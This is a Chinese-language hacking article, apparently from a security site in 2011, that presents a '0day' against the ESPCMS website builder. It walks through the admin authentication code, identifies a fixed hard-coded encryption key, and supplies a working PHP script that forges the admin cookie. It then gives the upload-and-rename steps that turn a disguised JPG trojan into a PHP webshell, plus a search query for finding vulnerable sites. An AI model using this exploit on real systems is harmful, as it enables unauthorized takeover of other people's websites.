首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>入侵实例>文章内容
ESPCMS 易思企业建站系统 0day
来源:vfocus.net 作者:黑小子 发布时间:2011-01-19  

以下版本没测试,测试的是最新版本。Google:Powered by ESPCMS,过程有点复杂,耐心看就明白。

    看代码:“adminsoft\control”,里面的文件都是后台运行文件,每个文件开头都带有 $this->softbase(true),用于载入基本数据,看:

以下是引用片段:

function softbase($admin_purview=false) {

                header("Content-Type: text/html; charset=utf-8");
                $this->dbmysql();
                $this->commandinc();
                $this->systemfile();
                $this->cachedb();
                if ($admin_purview) {
                        $this->admin_purview();
                }

admin_purview  是检测登录状态的
再看 

function admin_purview() {
                if ($this->fun->accept('archive', 'R') == 'filemanage' && $this->fun->accept('action', 'R') == 'batupfilesave') {

                        $ecisp_admininfo = $this->fun->accept('ecisp_admininfo', 'G');
                        $esp_powerlist = $this->fun->accept('esp_powerlist', 'G');
                        $gettype = false;
                } else {
                        $ecisp_admininfo = $this->fun->accept('ecisp_admininfo', 'C');
                        $esp_powerlist = $this->fun->accept('esp_powerlist', 'C');
                        $gettype = true;
                }

               $arr_purview = explode('|', $this->fun->eccode($ecisp_admininfo, 'DECODE'));// 其他都没什么用 这里才是重点 by Black Boy

                $this->esp_powerlist = explode('|', $this->fun->eccode($esp_powerlist, 'DECODE'));

                list($this->esp_adminuserid, $this->esp_username, $this->esp_password, $this->esp_useragent, $this->esp_powerid, $this->esp_inputclassid, $this->esp_softurl) = $arr_purview;
                if ($gettype) {
                       if (empty($this->esp_username) || empty($this->esp_adminuserid) || md5(admin_AGENT) != $this->esp_useragent || md5(admin_ClassURL) != $this->esp_softurl)  //检测是否有这些东西 有就跳过检测 没有就返回登录页面 下面意思简单 不解析了{Black Boy

以下是引用片段:

                                $condition = 0;
                        } else {
                                $condition = 1;
                        }
                } else {
                        if (empty($this->esp_username) || empty($this->esp_adminuserid) || md5(admin_ClassURL) != $this->esp_softurl) {
                                $condition = 0;
                        } else {
                                $condition = 1;
                        }
                }
                if ($condition == 0) {

                        if ($this->fun->accept('archive', 'R') != 'adminuser' && $this->fun->accept('action', 'R') != 'login') {
                                header('location: index.php?archive=adminuser&action=login');
                                exit();
                        }
                } else {

                        if ($condition == 1 && $this->fun->accept('point', 'R') == '' && $this->fun->accept('archive', 'R') == '' && $this->fun->accept('action', 'R') == '') {
                                header('location: index.php?archive=management&action=tab&loadfun=mangercenter');
                                exit();
                        }
                }
        }

那么 现在最重点的就是 eccode 这个加密方式了
看代码


function eccode($string, $operation='DECODE', $key='@LFK24s224%@safS3s%1f%') {
                $result = '';
                if ($operation == 'ENCODE') {
                        for ($i = 0; $i < strlen($string); $i++) {
                                $char = substr($string, $i, 1);
                                $keychar = substr($key, ($i % strlen($key)) - 1, 1);
                                $char = chr(ord($char) + ord($keychar));
                                $result.=$char;
                        }
                        $result = base64_encode($result);
                        $result = str_replace(array('+', '/', '='), array('-', '_', ''), $result);
                } elseif ($operation == 'DECODE') {
                        $data = str_replace(array('-', '_'), array('+', '/'), $string);
                        $mod4 = strlen($data) % 4;
                        if ($mod4) {
                                $data .= substr('====', $mod4);
                        }
                        $string = base64_decode($data);
                        for ($i = 0; $i < strlen($string); $i++) {
                      $char = substr($string, $i, 1);
                                $keychar = substr($key, ($i % strlen($key)) - 1, 1);
                                $char = chr(ord($char) - ord($keychar));
                                $result.=$char;
                }
                }
                return $result;

很明显  解密都不用写了  反过来行了  一个一个加密过程解析出来很辛苦的
核心漏洞就是  $key='@LFK24s224%@safS3s%1f%'
不是随机生成

Exp:

<?
function eccode($string, $operation='DECODE', $key='@LFK24s224%@safS3s%1f%') {
                $result = '';
                if ($operation == 'ENCODE') {
                        for ($i = 0; $i < strlen($string); $i++) {
                                $char = substr($string, $i, 1);
                                $keychar = substr($key, ($i % strlen($key)) - 1, 1);
                                $char = chr(ord($char) + ord($keychar));
                                $result.=$char;
                        }
                        $result = base64_encode($result);
                        $result = str_replace(array('+', '/', '='), array('-', '_', ''), $result);
                } elseif ($operation == 'DECODE') {
                        $data = str_replace(array('-', '_'), array('+', '/'), $string);
                        $mod4 = strlen($data) % 4;
                        if ($mod4) {
                                $data .= substr('====', $mod4);
                        }
                        $string = base64_decode($data);
                        for ($i = 0; $i < strlen($string); $i++) {
                      $char = substr($string, $i, 1);
                                $keychar = substr($key, ($i % strlen($key)) - 1, 1);
                                $char = chr(ord($char) - ord($keychar));
                                $result.=$char;
                }
                }
                return $result;
        }
        define('admin_AGENT', $_SERVER['HTTP_USER_AGENT']);
        $name=$_POST[name];
        $s=md5(admin_AGENT);
        $ecisp_admininfo='1|admin|e00cf25ad42683b3df678c61f42c6bda|'.$s.'|1|1|'.md5("http://".$name."/adminsoft");
$a= eccode($ecisp_admininfo, 'ENCODE');
echo "ecisp_admininfo=".$a.";esp_powerlist=hqy4;"."<br><br><br>";
?>

<form method="post" action="http://www.hackersb.com/sb/test.php" enctype="multipart/form-data" id="upload">
  <label>
  <input name="name" type="text" value="www.t00ls.net" />      by:Black Boy  www.hackersb.com
  </label>
    <div></div>
<input name="respondids" value="给我COOKIES " class="coolbg np" type="submit">
</form>

    注:$s为当前浏览器版本,你用什么浏览器去运行这个程序的,就用这个浏览器去欺骗。

    得出 COOKIES 后修改欺骗,进入后台。然后内容添加,上传文件,把马儿改成JPG上传。

    最后POST:

/adminsoft/index.php?archive=filemanage&action=renamesave

path=/upfile/&dirname=product.jpg&newdirnam=1.php

    product.jpg 为上传后的JPG木马文件,最后 webshell 就在:upfile/1.php

 

首发兄弟:黑小子


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·另类网站入侵之一句话木马图片的
·0day批量拿站webshell,挖掘机是
·利用ewebeditor 5.5 - 6.0 鸡肋
·OmniPeek抓包的一点看法
·强大的嗅探工具ettercap使用教程
·Windows系统密码破解全攻略
·破解禁止SSID广播
·XSS偷取密码Cookies通用脚本
·XSS漏洞基本攻击代码
·Intel 3945ABG用OmniPeek 4.1抓
·KesionCMS V7.0科汛内容网站管理
·破解无线过滤MAC
  相关文章
·discuz xss 0day利用方法
·各种渗透,提权的经验和技巧总结
·WebLogic简单抓鸡大法
·ECSHOP漏洞入侵成人用品购物网站
·记一次艰难的提权
·对某一NX服务器的MSSQL渗透提权
·Windows系统密码破解全攻略(hash
·长达1年半的一次艰难渗透
·Exploitation Without A TTY
·分享shopex后台最新拿shell方法
·啊江统计系统V1.6 版本后台拿SHE
·Metasploit with MYSQL in BackT
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved